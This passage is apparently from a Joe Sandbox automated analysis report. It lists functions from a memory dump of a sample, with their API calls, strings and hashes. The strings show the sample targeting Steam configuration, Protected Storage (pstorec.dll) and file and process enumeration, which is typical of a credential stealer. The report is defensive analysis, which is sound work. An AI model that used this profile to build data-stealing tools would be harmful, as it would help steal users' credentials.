                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s\%s$Soft$Software\Valve\Steam$SteamPath$\Steam\$\config\
                                                                                                                                                                                                                                                                                      • API String ID: 3353021899-493467598
                                                                                                                                                                                                                                                                                      • Opcode ID: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                                      • Instruction ID: f04b4360dc0817d558250c3cdd1667f1ca9511f4c4837c2270bb77207d21b6f3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1132B531C007589BDF10EF65CD85AEDB778BF58304F00929AF90967152EB78AAC5CB94
                                                                                                                                                                                                                                                                                      Function 004170D0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 117stringfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFindstrcpy$strlenwsprintf$CloseFirstFolderNextOperationPath_splitpathisupper
                                                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                                                      • API String ID: 3519957579-2663966076
                                                                                                                                                                                                                                                                                      • Opcode ID: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                      • Instruction ID: 114bed65e9d4b9d73eb4094e4860af952423d6fe10318c0fdbdbb5acdc2bd80f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8413B71908348AFD2209B21DC05BEB77BCAFD5304F04452EF99982251E779A689C7AB
                                                                                                                                                                                                                                                                                      Function 0041D3F0 Relevance: 7.6, APIs: 5, Instructions: 109fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3457131274-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                      • Instruction ID: 75c582a46244fff173573742a7ab3bbcd042cdd94e8295cbfc9d5a78f2bf368e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A03107F1A0474ABFD354DF25ED84AA7B7A8FB45308F44412AE84483B41E338F965CBA5
                                                                                                                                                                                                                                                                                      Function 00411ED0 Relevance: 7.5, APIs: 5, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411F2F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                      • Instruction ID: 12a5467778ca0c5a55c84e6a3ebf7af38e155dcebc9527c53f9d4ce48d6bebb5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33F06D312052156BE3201B22EC08FABBBECEF86795F04142DF549D6260DB289852C7B5
                                                                                                                                                                                                                                                                                      Function 0041D850 Relevance: 6.1, APIs: 4, Instructions: 71timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041D88A
                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D894
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D8AF
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D914
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                      • Instruction ID: 853963dc4ef663bce705e73e50dc6f04fde9a019ac164f808202a007976d34a8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A2100B28147109AE305CF29C8557B7BBE4FF94384F004A2EF0C29A252EB75D086D761
                                                                                                                                                                                                                                                                                      Function 004011B0 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?,7591F360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                      • Instruction ID: 1e243eb0cc245641358f316f4ded0038930a38816da4ddb4eced82cb662ad228
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29E04F363013149BC6208B89ECC5D57BBAAEB8D7F4B5A4172EA045B326D275AC50CA64
                                                                                                                                                                                                                                                                                      Function 0041A340 Relevance: .4, Instructions: 438COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                      • Instruction ID: 81a96ac3c5c45741fb44ce0365675c3fdd34da691af61be43d7ddf4b7eb2458a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59224CB57062998FCB35CF99C9805E9B7A2BF8A310F14852EDC4D8B351C734AA47DB42
